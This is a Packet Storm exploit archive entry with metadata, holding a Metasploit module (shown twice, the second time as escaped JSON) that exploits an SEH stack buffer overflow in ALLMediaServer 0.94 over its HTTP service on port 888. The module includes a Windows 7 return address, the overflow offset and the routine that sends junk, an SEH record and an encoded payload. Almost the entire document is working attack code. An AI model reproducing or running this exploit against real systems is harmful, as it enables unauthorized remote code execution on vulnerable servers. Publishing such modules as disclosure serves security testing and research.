ID PACKETSTORM:121006 Type packetstorm Reporter metacom Modified 2013-03-29T00:00:00
Description
`##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
#Rank definition: http://dev.metasploit.com/redmine/projects/framework/wiki/Exploit_Ranking
#ManualRanking/LowRanking/AverageRanking/NormalRanking/GoodRanking/GreatRanking/ExcellentRanking
Rank = NormalRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Seh
def initialize(info = {})
super(update_info(info,
'Name' => 'ALLMediaServer 0.94 Buffer Overflow Exploit',
'Description' => %q{
This module exploits a stack buffer overflow in ALLMediaServer 0.94. The vulnerability
is caused due to a boundary error within the handling of HTTP request.
},
'License' => MSF_LICENSE,
'Author' =>
[
'metacom<metacom27[at]gmail.com>', # Original discovery
'<metacom>', # MSF Module
'RST',
],
'References' =>
[
[ 'OSVDB', '<insert OSVDB number here>' ],
[ 'CVE', 'insert CVE number here' ],
[ 'URL', 'http://www.bugsearch.net/en/14147/allmediaserver-094-seh-overflow-exploit.html' ]
],
'DefaultOptions' =>
{
'ExitFunction' => 'process', #none/process/thread/seh
#'InitialAutoRunScript' => 'migrate -f',
},
'Platform' => 'win',
'Payload' =>
{
'BadChars' => "\x00", # <change if needed>
'DisableNops' => true,
},
'Targets' =>
[
[ 'Windows 7',# Tested on: Windows 7 SP1/SP0
{
'Ret' => 0x65EC24CA, # pop eax # pop ebx # ret - avcodec-53.dll
'Offset' => 1065
}
],
],
'Privileged' => false,
#Correct Date Format: "M D Y"
#Month format: Jan,Feb,Mar,Apr,May,Jun,Jul,Aug,Sep,Oct,Nov,Dec
'DisclosureDate' => 'Mar 28 2013',
'DefaultTarget' => 0))
register_options([Opt::RPORT(888)], self.class)
end
def exploit
connect
buffer = "http://"
buffer << rand_text(target['Offset']) #junk
buffer << generate_seh_record(target.ret)
buffer << payload.encoded #3931 bytes of space
# more junk may be needed to trigger the exception
print_status("Sending payload to ALLMediaServer on #{target.name}...")
sock.put(buffer)
handler
disconnect
end
end
`
{"id": "PACKETSTORM:121006", "type": "packetstorm", "bulletinFamily": "exploit", "title": "ALLMediaServer 0.94 Buffer Overflow", "description": "", "published": "2013-03-29T00:00:00", "modified": "2013-03-29T00:00:00", "cvss": {"vector": "NONE", "score": 0.0}, "href": "https://packetstormsecurity.com/files/121006/ALLMediaServer-0.94-Buffer-Overflow.html", "reporter": "metacom", "references": [], "cvelist": [], "lastseen": "2016-11-03T10:29:28", "viewCount": 1, "enchantments": {"score": {"value": 1.2, "vector": "NONE", "modified": "2016-11-03T10:29:28", "rev": 2}, "dependencies": {"references": [], "modified": "2016-11-03T10:29:28", "rev": 2}, "vulnersScore": 1.2}, "sourceHref": "https://packetstormsecurity.com/files/download/121006/allmediaserver-0.94.rb.txt", "sourceData": "`## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \n#Rank definition: http://dev.metasploit.com/redmine/projects/framework/wiki/Exploit_Ranking \n#ManualRanking/LowRanking/AverageRanking/NormalRanking/GoodRanking/GreatRanking/ExcellentRanking \nRank = NormalRanking \n \ninclude Msf::Exploit::Remote::Tcp \ninclude Msf::Exploit::Seh \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'ALLMediaServer 0.94 Buffer Overflow Exploit', \n'Description' => %q{ \nThis module exploits a stack buffer overflow in ALLMediaServer 0.94. The vulnerability \nis caused due to a boundary error within the handling of HTTP request. \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'metacom<metacom27[at]gmail.com>', # Original discovery \n'<metacom>', # MSF Module \n'RST', \n], \n'References' => \n[ \n[ 'OSVDB', '<insert OSVDB number here>' ], \n[ 'CVE', 'insert CVE number here' ], \n[ 'URL', 'http://www.bugsearch.net/en/14147/allmediaserver-094-seh-overflow-exploit.html' ] \n], \n'DefaultOptions' => \n{ \n'ExitFunction' => 'process', #none/process/thread/seh \n#'InitialAutoRunScript' => 'migrate -f', \n}, \n'Platform' => 'win', \n'Payload' => \n{ \n'BadChars' => \"\\x00\", # <change if needed> \n'DisableNops' => true, \n}, \n \n'Targets' => \n[ \n[ 'Windows 7',# Tested on: Windows 7 SP1/SP0 \n{ \n'Ret' => 0x65EC24CA, # pop eax # pop ebx # ret - avcodec-53.dll \n'Offset' => 1065 \n} \n], \n], \n'Privileged' => false, \n#Correct Date Format: \"M D Y\" \n#Month format: Jan,Feb,Mar,Apr,May,Jun,Jul,Aug,Sep,Oct,Nov,Dec \n'DisclosureDate' => 'Mar 28 2013', \n'DefaultTarget' => 0)) \n \nregister_options([Opt::RPORT(888)], self.class) \n \nend \n \ndef exploit \n \n \nconnect \nbuffer = \"http://\" \nbuffer << rand_text(target['Offset']) #junk \nbuffer << generate_seh_record(target.ret) \nbuffer << payload.encoded #3931 bytes of space \n# more junk may be needed to trigger the exception \n \nprint_status(\"Sending payload to ALLMediaServer on #{target.name}...\") \nsock.put(buffer) \n \nhandler \ndisconnect \n \nend \nend \n`\n"}